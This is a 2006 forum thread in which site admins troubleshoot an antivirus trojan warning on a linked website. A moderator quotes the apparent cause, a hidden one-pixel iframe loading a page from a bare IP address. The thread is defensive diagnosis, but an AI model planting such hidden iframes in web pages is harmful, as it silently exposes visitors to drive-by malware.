| Author |
Message |
jakec
Site Admin
Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom
|
 Posted:
Thu Nov 02, 2006 2:16 pm |
|
I've just been checking out the various links in Ravens recommended sites block, on the home page, and I'm getting a trojan warning for the pHenylshouse link.
To be more exact it's showing the file as phenylshouse[1].htm and the trojan name is JS/Downloader-AUD.
I was just wondering if anybody else is getting the same warning?  |
| |
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Thu Nov 02, 2006 5:11 pm |
|
|
|
|
|
jakec
|
| Posted:
Fri Nov 03, 2006 12:30 pm |
|
I should of mentioned that I'm using McAfee and it is automatically sorting it out, so I'm not infected, but if I go back I get the same warning from McAfee.
It's got to be something from that website because of the filename.
What viruschecker are you using?
I would be interested to know if anyone else using McAfee is getting the same message? |
| |
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
| Posted:
Fri Nov 03, 2006 12:39 pm |
|
Nope not getting it, I'm using F-Secure |
| |
|
|
|
jakec
|
| Posted:
Fri Nov 03, 2006 12:46 pm |
|
|
|
|
|
jakec
|
| Posted:
Fri Nov 03, 2006 12:48 pm |
|
Just checked the site I had the problem with before and I'm getting the same warning I had before. |
| |
|
|
|
|
Guardian2003
|
| Posted:
Fri Nov 03, 2006 12:55 pm |
|
I think this is what they call in the trade a 'false positive' - I think McAFee is being a little over jealous, it can happen sometimes, especially with ja va script. |
| |
|
|
|
|
jakec
|
| Posted:
Fri Nov 03, 2006 1:04 pm |
|
Is anybody getting a warning for: http://www.ourscripts.net/ ??
If you use McAfees siteadvisor they say that they tested this site and found the site does try to make changes to your PC.
SiteAdvisor doesn't give a warning for phenylshouse site, but I have submitted it to McAfee to check. If it is a false positive they may be able to do something about it. |
| |
|
|
|
|
jakec
|
| Posted:
Fri Nov 03, 2006 1:05 pm |
|
Is anybody getting a warning for: http://www.ourscripts.net/ ??
If you use McAfees siteadvisor they say that they tested this site and found the site does try to make changes to your PC.
SiteAdvisor doesn't give a warning for phenylshouse site, but I have submitted it to McAfee to check. If it is a false positive they may be able to do something about it. |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Nov 03, 2006 3:17 pm |
|
there are no problems with ourscripts...
and im using norton.
only error (behind black top) i see is...
Warning: Cannot modify header information - headers already sent by (output started at /home/ourscrip/public_html/index.php:1) in /home/ourscrip/public_html/mainfile.php on line 195 |
| |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Fri Nov 03, 2006 11:22 pm |
|
It is still detecting it through McAfee Viruscan
My guess is that it is this iframe here
Code:
<if rame src= http://85.249.22.18/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></if rame>
|
Removing that code and it is no longer a threat by McAfee |
_________________
- Only registered users can see links on this board! Get registered or login! -
Need help? Only registered users can see links on this board! Get registered or login! |
|
|
|
jakec
|
| Posted:
Sat Nov 04, 2006 2:51 am |
|
Evaders, that is what I noticed last time.
On the pHenlyhouse site everything seems to be encrypted, so I can't see anything. |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
